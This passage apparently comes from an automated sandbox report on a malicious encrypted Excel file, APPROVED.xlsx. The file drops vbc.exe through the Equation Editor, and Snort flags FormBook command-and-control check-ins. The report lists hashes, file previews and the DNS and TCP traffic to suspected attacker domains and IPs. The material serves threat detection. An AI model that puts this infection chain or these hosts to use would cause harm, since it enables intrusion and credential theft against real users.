                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4DE8BD0.jpeg
                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):48770
                                                                                                                                                        Entropy (8bit):7.801842363879827
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                        C:\Users\user\Desktop\~$APPROVED.xlsx
                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):330
                                                                                                                                                        Entropy (8bit):1.4377382811115937
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                        MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        C:\Users\Public\vbc.exe
                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1832960
                                                                                                                                                        Entropy (8bit):7.369530849111079
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:Sv0H4JghFaUabDkakP0/ZeGPDWOlxm0Zx:Y4o/b5f/hR3m0
                                                                                                                                                        MD5:92BD99870C4E2829F3E6D1B3B512067D
                                                                                                                                                        SHA1:2DB671375AE170FF9B3E733FED98C2C7E7EF355A
                                                                                                                                                        SHA-256:D69E95A9CA264C1547CDB2475244A145E79A321A58D35C2B2DD6183A032AAF16
                                                                                                                                                        SHA-512:3A2FD22C948DD0A26B8971C9A907E6FC29AE1F5F32B1B6B23836D29C13E172D6D8C404F3BDFF976F8A20E28968D48A316E1437EB6EFC99FD03C581B44B08A984
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.`..............P.................. ... ....@.. .......................`............@.................................@...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................t.......H.......Tm..4............................................................0............(,...(-.........(.....o.....*.....................(/......(0......(1......(2......(3....*N..(....o!...(4....*N..(....o....(5....*&..(6....*.s7........s8........s9........s:........s;........*....0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0...........~....o?....+..*.0...........~....o@....+..*.0..<........~.....(A.....,!r...p.....(B...oC...sD..........

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:CDFV2 Encrypted
                                                                                                                                                        Entropy (8bit):7.992739860343387
                                                                                                                                                        TrID:
                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                        File name:APPROVED.xlsx
                                                                                                                                                        File size:1101944
                                                                                                                                                        MD5:09d492cf4937df0290af0be36ba30421
                                                                                                                                                        SHA1:4ad8665febc2f0524d0b23c8f94d947e1a563e14
                                                                                                                                                        SHA256:c0697b83e4d63f9a380466b91ba7db94e823b7a2fd137811bfcce5796a9b82f6
                                                                                                                                                        SHA512:aa0cab4e5e13873823cd3f30d7cf35070a86171afe6df04e197d0c975c9ced993547a6a58b1d2e6d5de506262f8c19d9d65a1fdf3a8eb57a666706089285085d
                                                                                                                                                        SSDEEP:24576:mX3rVzlf9/dZVT+8CzGYuUSUTsMYn+AX3rizKF/60wXnNkt:SVz7/dZVyT3XwV+O6nNkt
                                                                                                                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                        Static OLE Info

                                                                                                                                                        General

                                                                                                                                                        Document Type:OLE
                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                        OLE File "APPROVED.xlsx"

                                                                                                                                                        Indicators

                                                                                                                                                        Has Summary Info:False
                                                                                                                                                        Application Name:unknown
                                                                                                                                                        Encrypted Document:True
                                                                                                                                                        Contains Word Document Stream:False
                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                        Flash Objects Count:
                                                                                                                                                        Contains VBA Macros:False

                                                                                                                                                        Streams

                                                                                                                                                        Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:64
                                                                                                                                                        Entropy:2.73637206947
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                        Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                        Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:112
                                                                                                                                                        Entropy:2.7597816111
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                        Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                        Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:208
                                                                                                                                                        Entropy:3.35153409046
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                        Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                        General
                                                                                                                                                        Stream Path:\x6DataSpaces/Version
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:76
                                                                                                                                                        Entropy:2.79079600998
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                        Stream Path: EncryptedPackage, File Type: data, Stream Size: 1086072
                                                                                                                                                        General
                                                                                                                                                        Stream Path:EncryptedPackage
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:1086072
                                                                                                                                                        Entropy:7.99980853948
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:c . . . . . . . . [ . . . f . . . . . . . g . 7 . . . y 6 ` . . . . . . . . . . . [ . . ' . . . . . . P ] 2 . | . . . . f . . $ . 6 q b l . . X . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H . . . . . . . w . . . ? , . 3 H
                                                                                                                                                        Data Raw:63 92 10 00 00 00 00 00 c0 5b 09 f7 89 66 f1 ae de e9 a8 d0 9f 67 ec 37 bb 1b d0 79 36 60 f4 90 03 06 83 8b a4 c2 f7 03 06 5b c3 f1 27 f7 02 f2 aa ad a2 50 5d 32 90 7c 0c ee f0 1e 66 9b eb 24 a8 36 71 62 6c a9 8e 58 a3 e8 c3 3f 2c 94 33 48 c1 e6 fe f4 9c 90 c3 77 a3 e8 c3 3f 2c 94 33 48 c1 e6 fe f4 9c 90 c3 77 a3 e8 c3 3f 2c 94 33 48 c1 e6 fe f4 9c 90 c3 77 a3 e8 c3 3f 2c 94 33 48
                                                                                                                                                        Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                        General
                                                                                                                                                        Stream Path:EncryptionInfo
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:224
                                                                                                                                                        Entropy:4.69340331654
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . @ . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . e j X . . C . " ' . ^ . . . . . . . F M . W - . . a o P . . W . . . . . l . . . . . . . , ? v . . j \\ . . q . \\ . 1 . . f . . . y . .
                                                                                                                                                        Data Raw:03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 40 dd b2 05 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                        Network Behavior

                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                        05/13/21-08:30:52.716889TCP1201ATTACK-RESPONSES 403 Forbidden804916923.227.38.74192.168.2.22
                                                                                                                                                        05/13/21-08:31:03.737711TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2275.2.66.247
                                                                                                                                                        05/13/21-08:31:03.737711TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2275.2.66.247
                                                                                                                                                        05/13/21-08:31:03.737711TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2275.2.66.247

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        May 13, 2021 08:29:30.546329021 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:30.839442968 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:30.839543104 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:30.839982986 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:31.134192944 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.134229898 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.134257078 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.134257078 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:31.134273052 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:31.134284019 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.134290934 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:31.134316921 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:31.427437067 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.427473068 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.427488089 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.427504063 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.427524090 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.427544117 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.427565098 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.427599907 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.427714109 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:31.427731037 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:31.721514940 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721551895 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721564054 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721576929 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721587896 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721601009 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721616983 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721630096 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721642017 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721653938 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721668959 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721672058 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:31.721681118 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721698999 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:31.721705914 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:31.721730947 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:31.721751928 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:31.723664045 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:32.014962912 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015001059 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015027046 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015048027 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015072107 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015089989 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015100956 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015113115 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015125036 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015136957 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015151024 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015172958 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015188932 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015203953 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015214920 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015227079 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015238047 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015249014 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015259981 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015270948 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015283108 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.015288115 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:32.015321970 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:32.015345097 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:32.017878056 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:32.308445930 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308471918 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308482885 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308495045 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308506966 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308517933 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308532000 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308543921 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308554888 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308567047 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308578968 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308589935 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308608055 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308619976 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308635950 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308649063 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:32.308650970 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308666945 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308676004 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:32.308681965 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308696985 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308711052 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308727026 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308746099 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308747053 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:32.308758020 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:32.308762074 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308763027 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:32.308778048 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308794022 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308799028 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:32.308809042 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308809996 CEST4916780192.168.2.223.36.53.50
                                                                                                                                                        May 13, 2021 08:29:32.308823109 CEST80491673.36.53.50192.168.2.22
                                                                                                                                                        May 13, 2021 08:29:32.308840036 CEST80491673.36.53.50192.168.2.22

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        May 13, 2021 08:30:39.203344107 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                        May 13, 2021 08:30:39.269969940 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                        May 13, 2021 08:30:45.059938908 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                        May 13, 2021 08:30:45.124401093 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                        May 13, 2021 08:30:52.420767069 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                        May 13, 2021 08:30:52.493030071 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                        May 13, 2021 08:30:57.756908894 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                        May 13, 2021 08:30:57.819938898 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                        May 13, 2021 08:31:03.235810041 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                        May 13, 2021 08:31:03.694025040 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                        May 13, 2021 08:31:09.024107933 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                        May 13, 2021 08:31:09.089735985 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                        May 13, 2021 08:31:19.212193012 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                        May 13, 2021 08:31:19.270813942 CEST53560098.8.8.8192.168.2.22

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                        May 13, 2021 08:30:39.203344107 CEST192.168.2.228.8.8.80xccffStandard query (0)www.hfjxhs.comA (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:30:45.059938908 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.zgcbw.netA (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:30:52.420767069 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.essentiallyourscandles.comA (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:30:57.756908894 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.brunoecatarina.comA (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:31:03.235810041 CEST192.168.2.228.8.8.80x6ec7Standard query (0)www.zmzcrossrt.xyzA (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:31:09.024107933 CEST192.168.2.228.8.8.80xf09aStandard query (0)www.cyrilgraze.comA (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:31:19.212193012 CEST192.168.2.228.8.8.80x18f7Standard query (0)www.myfavbutik.comA (IP address)IN (0x0001)

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                        May 13, 2021 08:30:39.269969940 CEST8.8.8.8192.168.2.220xccffNo error (0)www.hfjxhs.com156.241.53.161A (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:30:45.124401093 CEST8.8.8.8192.168.2.220x2e78Name error (3)www.zgcbw.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:30:52.493030071 CEST8.8.8.8192.168.2.220x2f03No error (0)www.essentiallyourscandles.comessentially-yours-candles-by-taylor.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:30:52.493030071 CEST8.8.8.8192.168.2.220x2f03No error (0)essentially-yours-candles-by-taylor.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:30:52.493030071 CEST8.8.8.8192.168.2.220x2f03No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:30:57.819938898 CEST8.8.8.8192.168.2.220x3c4eNo error (0)www.brunoecatarina.com54.85.86.211A (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:31:03.694025040 CEST8.8.8.8192.168.2.220x6ec7No error (0)www.zmzcrossrt.xyzytptranspx.xshoppy.shopCNAME (Canonical name)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:31:03.694025040 CEST8.8.8.8192.168.2.220x6ec7No error (0)ytptranspx.xshoppy.shop75.2.66.247A (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:31:09.089735985 CEST8.8.8.8192.168.2.220xf09aNo error (0)www.cyrilgraze.com104.21.65.7A (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:31:09.089735985 CEST8.8.8.8192.168.2.220xf09aNo error (0)www.cyrilgraze.com172.67.138.177A (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:31:19.270813942 CEST8.8.8.8192.168.2.220x18f7No error (0)www.myfavbutik.com104.21.15.16A (IP address)IN (0x0001)
                                                                                                                                                        May 13, 2021 08:31:19.270813942 CEST8.8.8.8192.168.2.220x18f7No error (0)www.myfavbutik.com172.67.161.4A (IP address)IN (0x0001)

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • 3.36.53.50
                                                                                                                                                        • www.hfjxhs.com
